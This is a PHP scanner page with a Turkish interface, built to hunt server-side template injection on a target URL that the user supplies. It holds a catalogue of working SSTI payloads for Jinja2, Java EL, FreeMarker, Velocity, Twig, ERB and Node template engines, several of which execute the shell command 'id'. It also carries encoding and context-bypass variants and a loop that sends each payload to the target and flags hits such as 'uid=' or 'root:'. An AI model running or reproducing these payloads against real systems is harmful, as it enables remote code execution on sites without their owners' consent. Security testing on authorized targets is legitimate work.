<?php
// Runtime setup for the scanner page.
// Errors are rendered inline, development style.
// NOTE(review): display_errors also surfaces file paths and stack details in
// the served page; when this is hosted anywhere beyond a local lab, logging
// to a file is the safer choice.
ini_set('display_errors', '1');
error_reporting(E_ALL);

// The whole scan loop is built on ext/curl; without it there is nothing to run.
if (!extension_loaded('curl')) {
    exit("CRITICAL: CURL is missing!");
}

// A single run issues one request per (parameter, test string, encoding) and
// keeps every reported row in memory, so the default time and memory ceilings
// are lifted for the request.
set_time_limit(0);
ini_set('memory_limit', '2G');
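class FinalSingularity {
    /**
     * Returns the built-in catalogue of template test strings, keyed by
     * engine family.
     *
     * The catalogue is static. The $w argument (the "Webhook (OOB)" form
     * field) is accepted for call compatibility but is not referenced by any
     * entry, so no out-of-band callback strings are produced from it.
     *
     * @param string $w Webhook URL; currently unused.
     * @return array<string, list<string>> Engine label => list of test strings.
     */
    public static function getDatabase($w = "") {
        // $w intentionally unused (see docblock).
        return [
            "Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'],
            "Python (Jinja2/Mako/Django)" => [
                '{{' . 'config.items()}}', '{{' . 'self.__dict__}}',
                '{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}',
                '${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}',
            ],
            "Java (EL/FreeMarker/Velocity)" => [
                '${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}',
                '${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}',
                '<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}',
                '#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))',
            ],
            "PHP (Twig/Smarty/Blade)" => [
                '{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}',
                '{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
                '{' . 'smarty.template_vars}',
            ],
            "Ruby & JS (ERB/EJS/Slim)" => [
                '<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>',
                '{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}',
            ],
            "Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}'],
        ];
    }

    /**
     * Builds the encoding variants of one test string.
     *
     * 'Raw' is always present; the other entries follow the selected options:
     *   url    -> 'URL'      urlencode()
     *   double -> 'D-URL'    urlencode() applied twice
     *   hex    -> 'Hex'      every byte as %XX (two lowercase hex digits)
     *   uni    -> 'Unicode'  every byte as \u00XX
     *   dec    -> 'Decimal'  comma-separated byte values
     *   ctx    -> 'Ctx_SQ', 'Ctx_DQ', 'Ctx_Tag'  the string wrapped in quote /
     *             tag terminators
     * Unknown option names are ignored.
     *
     * Bytes below 0x10 are zero-padded; the previous dechex() form produced
     * one-digit escapes ("%9", "\u009") that are not valid percent / \u
     * sequences.
     *
     * @param string          $p    The raw test string.
     * @param string[]|string $opts Option names; a bare string is treated as a one-element list.
     * @return array<string, string> Variant label => encoded string.
     */
    public static function applyMatrix($p, $opts) {
        $p = (string)$p;
        $opts = (array)$opts;
        // Byte values of $p; unpack('C*') on the empty string yields no entries.
        $bytes = $p === '' ? [] : array_values(unpack('C*', $p));

        $m = ['Raw' => $p];
        if (in_array('url', $opts, true)) {
            $m['URL'] = urlencode($p);
        }
        if (in_array('double', $opts, true)) {
            $m['D-URL'] = urlencode(urlencode($p));
        }
        if (in_array('hex', $opts, true)) {
            $h = '';
            foreach ($bytes as $b) {
                $h .= sprintf('%%%02x', $b);
            }
            $m['Hex'] = $h;
        }
        if (in_array('uni', $opts, true)) {
            $u = '';
            foreach ($bytes as $b) {
                $u .= sprintf('\\u%04x', $b);
            }
            $m['Unicode'] = $u;
        }
        if (in_array('dec', $opts, true)) {
            $m['Decimal'] = implode(',', $bytes);
        }
        if (in_array('ctx', $opts, true)) {
            $m['Ctx_SQ'] = "';" . $p . ";//";
            $m['Ctx_DQ'] = "\";" . $p . ";//";
            $m['Ctx_Tag'] = "}}" . $p . "{{";
        }
        return $m;
    }
}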
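$results = [];
$stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) {
    // Reads one scalar form field. A missing key (the form has no "headers"
    // input, for instance) or a non-string value (url[]=...) yields $default
    // instead of a warning under E_ALL or a TypeError further down.
    $field = function ($key, $default = '') {
        $value = $_POST[$key] ?? $default;
        return is_string($value) ? $value : $default;
    };

    $target    = trim($field('url'));
    $params    = array_filter(array_map('trim', explode(',', $field('params'))));
    $webhook   = $field('webhook');
    $opts      = (array)($_POST['opts'] ?? ['url']);
    $cookies   = $field('cookies');
    $headers   = array_filter(array_map('trim', explode("\n", $field('headers'))));
    $only_vuln = isset($_POST['only_vuln']);

    // Only the verbs offered by the <select> are forwarded; anything else would
    // otherwise be handed to curl verbatim as CURLOPT_CUSTOMREQUEST.
    $method = strtoupper(trim($field('method', 'GET')));
    if (!in_array($method, ['GET', 'POST', 'PUT', 'DELETE'], true)) {
        $method = 'GET';
    }

    // Accept only absolute http(s) targets. curl also speaks file://, gopher://
    // and more; CURLOPT_PROTOCOLS below applies the same restriction to the
    // transfer itself, redirects included.
    $scheme = parse_url($target, PHP_URL_SCHEME);
    $host = parse_url($target, PHP_URL_HOST);
    $target_ok = is_string($scheme) && is_string($host) && $host !== ''
        && in_array(strtolower($scheme), ['http', 'https'], true);
    if (!$target_ok) {
        $params = []; // nothing is sent; the page still renders with zero counts
    }

    // Request settings that do not depend on the individual test string are
    // built once; the loop only swaps URL / body per request.
    $http_headers = array_merge(['Content-Type: application/x-www-form-urlencoded'], array_values($headers));
    $base_opts = [
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_TIMEOUT => 8,
        CURLOPT_CONNECTTIMEOUT => 4,
        // Certificate checks are deliberately off so self-signed lab hosts can
        // be scanned; nothing in the response is trusted beyond the pattern match.
        CURLOPT_SSL_VERIFYPEER => 0,
        CURLOPT_SSL_VERIFYHOST => 0,
        CURLOPT_HEADER => 1, // headers are returned so header_size can split off the body
        CURLOPT_COOKIE => $cookies,
        CURLOPT_FOLLOWLOCATION => 1,
        CURLOPT_MAXREDIRS => 2,
        CURLOPT_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_REDIR_PROTOCOLS => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_NOSIGNAL => 1,
        CURLOPT_HTTPHEADER => $http_headers,
        CURLOPT_FAILONERROR => 0, // 4xx/5xx bodies are still inspected
        CURLOPT_ENCODING => '',
    ];
    if ($method === 'POST') {
        $base_opts[CURLOPT_POST] = 1;
    } elseif ($method !== 'GET') {
        $base_opts[CURLOPT_CUSTOMREQUEST] = $method;
    }

    $db = FinalSingularity::getDatabase($webhook);
    foreach ($params as $pr) {
        foreach ($db as $cat => $list) {
            foreach ($list as $raw) {
                foreach (FinalSingularity::applyMatrix($raw, $opts) as $mode => $final) {
                    $stats['total']++;
                    $payload_data = [$pr => $final];
                    $url = $target;
                    $req_opts = $base_opts;
                    if ($method === 'GET') {
                        $url .= (strpos($url, '?') !== false ? '&' : '?') . http_build_query($payload_data);
                    } else {
                        $req_opts[CURLOPT_POSTFIELDS] = http_build_query($payload_data);
                    }
                    $req_opts[CURLOPT_URL] = $url;

                    $ch = curl_init();
                    curl_setopt_array($ch, $req_opts);
                    $resp = curl_exec($ch);
                    $info = curl_getinfo($ch);
                    curl_close($ch);
                    // Transport failure (timeout, refused, DNS): nothing to inspect.
                    if ($resp === false) {
                        continue;
                    }

                    $body = substr($resp, $info['header_size']);
                    // preg_match returns 1/0, or false on a PCRE error; only a
                    // definite match is counted as a hit.
                    $v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body) === 1 ? 1 : 0;
                    if ($v) {
                        $stats['vuln']++;
                    }
                    if (!$only_vuln || $v) {
                        $results[] = [
                            'p' => $pr,
                            'cat' => $cat,
                            'm' => $mode,
                            'pld' => $final,
                            'st' => $info['http_code'] ?? 0,
                            'len' => strlen($body),
                            'v' => $v,
                            'u' => ($method === 'GET' ? $url : $target),
                        ];
                    }
                }
            }
        }
    }
}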
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>SSTI Sovereign Final v43.0</title>
<style>
:root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; }
body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; }
.box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); }
h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; }
input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; }
input:focus { border-color: var(--blue); }
.checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); }
.btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; }
.btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); }
.stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; }
.stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; }
.stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); }
table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; }
th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; }
td { padding: 10px; border-bottom: 1px solid var(--border); font-family: 'Consolas', monospace; font-size: 12px; }
.v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; }
.action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; }
</style>
</head>
<body>
<div class="box">
<h1>>> SSTI_HUNTER_FINAL_FIXED_v43</h1>
<form method="POST">
<div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;">
<div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Params</label><input type="text" name="params" value="id,template,q" required></div>
<div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div>
</div>
</div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div>
<div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div>
</div>
<div class="checks">
<label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label>
<label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label>
<label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label>
<label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label>
<label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label>
<label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label>
</div>
<button type="submit" name="launch" class="btn">Execute Final Strike</button>
</form>
</div>
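<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<?php
// Every dynamic value below goes through $e. The test strings, the engine
// labels ("Delimiters & Basics") and the target URL all contain
// markup-significant characters, and the target is operator input; ENT_QUOTES
// is passed explicitly because the default flags do not escape single quotes
// on older PHP releases.
$e = function ($s) {
    return htmlspecialchars((string)$s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
};
?>
<div class="stats-bar">
<div class="stat-item"><span class="stat-val"><?= (int)$stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div>
<div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= (int)$stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div>
<div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div>
<div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div>
</div>
<div class="box">
<table>
<thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead>
<tbody>
<?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?>
<?php foreach ($results as $r): ?>
<tr class="<?= $r['v'] ? 'v-row' : '' ?>">
<td><?= $e($r['p']) ?></td><td><?= $e($r['cat']) ?></td><td><?= $e($r['m']) ?></td>
<td><?= (int)$r['st'] ?></td><td><?= (int)$r['len'] ?> B</td>
<td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= $e($r['pld']) ?></td>
<td>
<?php /* The string to copy travels in a data attribute: HTML-escaping it once is
         sufficient, and the inline handler never embeds it inside a JS literal
         (addslashes() left " unescaped for the attribute and so broke the
         button for the Ctx_DQ rows). */ ?>
<button class="action-btn" data-pld="<?= $e($r['pld']) ?>" onclick="navigator.clipboard.writeText(this.dataset.pld); alert('Kopyalandı!')">COPY</button>
<a href="<?= $e($r['u']) ?>" target="_blank" rel="noopener noreferrer" class="action-btn">GO</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>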
</body>
</html>